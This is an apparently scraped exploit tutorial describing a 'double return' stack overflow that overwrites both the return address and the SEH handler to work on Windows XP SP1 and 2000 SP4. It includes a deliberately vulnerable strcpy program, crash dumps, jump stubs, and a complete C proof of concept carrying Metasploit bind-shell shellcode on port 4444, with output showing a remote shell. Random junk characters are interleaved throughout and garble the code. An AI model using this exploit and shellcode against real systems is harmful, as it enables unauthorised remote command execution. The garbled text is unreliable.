The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well. 7 w/ F K! Z" P% r& u: g6 ~9 @6 F: {: S; W( \: L0 X
[Buf] <- Shellcode . ~' R# R7 f% W0 _[Return Address] <- jmp register (for Windows XP sp1) 2 P N6 [( r& }8 M, M3 ][Various Stack Data] <- Junk $ R/ n+ L3 ~: L4 I W3 Y[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward ' N9 h s' j) o) W- r[SE Handler] <- jmp register (for Win2k sp4)- v: k; Q% D6 c& j" j3 s
[Stage1 Shellcode] <- stage1 shellcode for win2k. `1 t0 H3 I0 X3 A. w
( f* o3 ^- o, r) e% m# ?6 BIf the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses z0 p, a* y0 X4 q
' w% U- j1 W& m3 O, r# zchar buf[512]; / C s, S) O: X2 achar buf1[1024]; // <- simulate a stack- ~4 I E1 m7 A' V
//DebugBreak();4 L$ O5 v4 ^# z% `; J: r' _
if (argc != 2){ return -1; }( U' C2 n; Z, J
$ N! x/ i1 D2 M% f6 Fstrcpy(buf,argv[1]);/ y6 U; \& S: g
return 0x0;5 W. x9 b3 j% c: y3 R' _9 i
} , b: a" l) i2 e. C: d# ?5 x' e4 ^ " O: Y' D8 U! f+ IGetting Started: 1 R( Y0 f& ~* U! a7 a$ CBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:0 i' @% L4 b7 c' Q7 s1 L
% Y6 O5 q5 \" t
EAX 000000002 a$ Y3 Z8 H. G& z2 a0 H% k3 I% e" p" k
ECX 00321404' u& p% u4 }7 [
EDX 00414141: x @! X5 H0 B, L* Q; j/ Z
EBX 7FFDF000 ! @- ]# @' W6 A: SESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA": R/ q# x% c, Z' D( `/ C
EBP 41414141 {, s; O; G P1 {6 i( Q. UESI 77D4595F * ]! Q# e5 j7 r" K+ O# `9 hEDI 77F59037 ntdll.77F59037 4 X6 I/ U. i& _# m8 `' S" V fEIP 41414141* x% L- W Y0 o& W
% ~* ~& v W' j! @
Lets take a look at the stack and see what happened to the default exception handler: # Z+ s, A9 H" _$ i% U8 `$ |/ s( `* `0x0012FFB0 41414141 Pointer to next SEH Record, S8 m0 @/ O7 s, Z
0x0012FFB4 41414141 SE Handler 3 ]0 Y1 ]! B# h4 o- P4 s/ ^4 H6 x/ ^: J" n) r/ R
We successfully overwrote the return address and the default exception handler./ z$ Z4 a& ]8 f* N0 |. w
7 R1 a, S6 k; {4 V# S" |Primary Return Address (Windows XP SP1 EN): _* x# `/ Y2 l1 l) AThe first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:: m/ R; S* o/ j# c
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4") H( k0 g' M. V* n; x, ~
, l, V# n B0 {; k, m& Y9 GSecondary Return Address (Windows 2000 SP4 EN): $ n: p0 X1 C, D' b( HThe secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be: a) O3 R/ U: R. g+ q# e U
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1" + h( H- H u1 d: [ u) |* y2 ?4 h4 `0 x2 G
Proof Of Concept:! K# V- w' c& N! {$ ]6 ?
// exploit.c 8 t- D7 |# j& P( o// Tal zeltzer - [Double Return] //4 C, N- h. u6 `7 N+ _
) c9 P3 K8 Z+ c; J5 W. J#include<stdio.h>/ f0 Z$ Q+ k4 ~. G3 k, D2 H2 z
#include<string.h> 4 Z, K+ z& Q' B+ y6 |0 |$ B#include<windows.h>7 [; [/ N7 K& z; M
! Y7 e" ~% E( Q3 C" o2 G/ [
#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp. Y2 q/ Z! F+ ^$ `) M
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx 1 P; d. E7 I7 C" r, ?# J8 v( F
// Stage1 For WinXP Sp1 English( L# J' S& o4 O3 d$ S+ k8 ]
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"; ( I& x1 P4 _2 L/ b I( Y. A6 Z ; l8 b3 p" H2 F% W// Stage1 For Win2k Sp4 English' ] v* g- @" B' {& O
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"; 1 @" O! Z8 ~( F' H ]" t7 c" u; W! S: l0 c9 t
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com % m7 M- j: x: |& W4 ~8 ]7 g% a7 O7 L; Hunsigned char shellcode[] = ! t2 @) {: T: ~' m5 K"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"( R' Q2 r- h, P! K6 g. |/ c5 S
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"8 c m9 {+ ~( b; J2 t2 s& ?
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"+ U+ W) P* F3 p* H2 X
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0" * w% ]! k; O! j' E( e8 t"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"& x6 x* e, e8 ^& \" x/ R4 A/ u
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"( H2 E: j" r$ D, v0 ]- |3 H
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14") b4 |+ e0 g+ L$ ?
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53" - L5 f( w: ^, i8 I"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" . s* B3 ~0 O' K; j1 w"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf" F" p- h8 Y. h" m; I"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"9 I4 d9 @( K8 O, P
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" / _6 q6 d# A1 @- ?5 s, v"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"% c- {/ S: ^ k& _
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" ' ?$ h. j0 X: K"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f" 1 ]4 D! ]+ A' A5 z: r. o( P"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c" + V( z; F! |. P"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" 0 d, H. ^, A3 w' _) [# s0 L"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f") b+ I1 r3 D' S. N
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8" 3 H- @# i' T3 _: M* C; W"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" ' _+ ?' h; N" j/ ~"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"& B( u+ n! O2 ?0 E- N6 l
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" 1 E" P3 N* V0 K V- I6 r"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"9 k! O+ _! x3 [2 u9 s" @
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"/ C0 @7 }/ l% d! w
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; - q& p M8 \. S' K9 v" C7 D$ n8 ^9 \+ G: W' d# Y
3 R2 ]- {& F4 V
int main(int argc,char *argv[]){ ' A* P1 ^! X8 p 6 h- z4 Y n3 z) p6 x$ m# T+ uchar *bufExe[3]; . G; w* p! E# {. [& x- h6 q* c: }char buf[2048]; . E+ m+ J6 C5 f5 p% L/ U) I, LbufExe[0] = "lamebuf.exe";2 y4 }/ N* X# n- E
bufExe[2] = NULL;4 K6 U2 ?7 b" [/ y/ V
+ z/ m3 j6 K; k0 V' Omemset(buf,0x0,sizeof(buf)); " V1 O- V: s! [; ]4 jmemset(buf,0x90,1652);' Y* b2 P* D- I: a& u! X+ W
memcpy(&buf[24],shellcode,sizeof(shellcode)-1);! S. T, G% i* j: F5 O7 U
( D% U$ u' h6 q9 m9 P6 J8 q
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode 2 u: A0 d! L% Y9 ?/ `. Gmemcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode" m& `( V" ~1 W+ ~) o7 Z' V
, e2 F, B) u4 n: @ A5 w3 `
*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en 5 X+ X K1 b! b6 W*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code 0 g# m6 @3 ~% @5 t$ p, I( u6 Q*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en' e5 W+ X7 h/ H+ \" i! }
9 W: ]8 `4 K4 M. y . s$ I8 e( e! T; f8 L x4 u* p1 AbufExe[1] = buf;8 c; B: [8 K7 Z! y
//Execute the vulnerable application' S- O6 m# U c
execve(bufExe[0],bufExe,NULL);0 X. e% P4 U+ y- c0 f
0 l0 x2 ~* X$ o
return 0x0;$ n3 e# e4 R& {. w: t2 ~/ n$ M, k
}) c) V0 H+ E8 g5 G" K) i% `/ q
8 X8 j' u; E; e+ J. EExploit under Windows XP SP1:; r6 n: s4 ]# U) H5 O
C:\>exploit Z/ C; z2 X: I8 t/ jC:\> 8 P! O# G! O, m( @1 A8 YC:\>telnet 127.0.0.1 4444$ U9 o9 f: C/ B' n. J
0 H, k# X- r/ w4 T. z; X% @4 AMicrosoft Windows XP [Version 5.1.2600] & P7 y2 n; ]2 `. w4 |4 L& y(C) Copyright 1985-2001 Microsoft Corp. 9 P4 l j8 h$ M+ V) f+ Y" d+ W( J+ r2 l$ D
C:\> 2 a/ N* I) s4 I O2 h8 x+ I" Q: X3 B1 T1 x" ]7 X0 @' h' @$ t
Exploit under Windows 2000 SP4: 2 ?: D1 _. E2 S* L) TC:\>exploit & q' g6 u2 c1 ~* |5 d& C% WC:\>, I5 W9 v8 _7 R; L
C:\>telnet 127.0.0.1 4444 4 H0 A5 ]3 \9 P9 T8 J0 c& }9 _" ^0 h' ?0 ]9 y& W1 A' X' f& a
Microsoft Windows 2000 [Version 5.00.2195] / @8 h" N! g! D& k/ |, E3 F(C) Copyright 1985-2000 Microsoft Corp.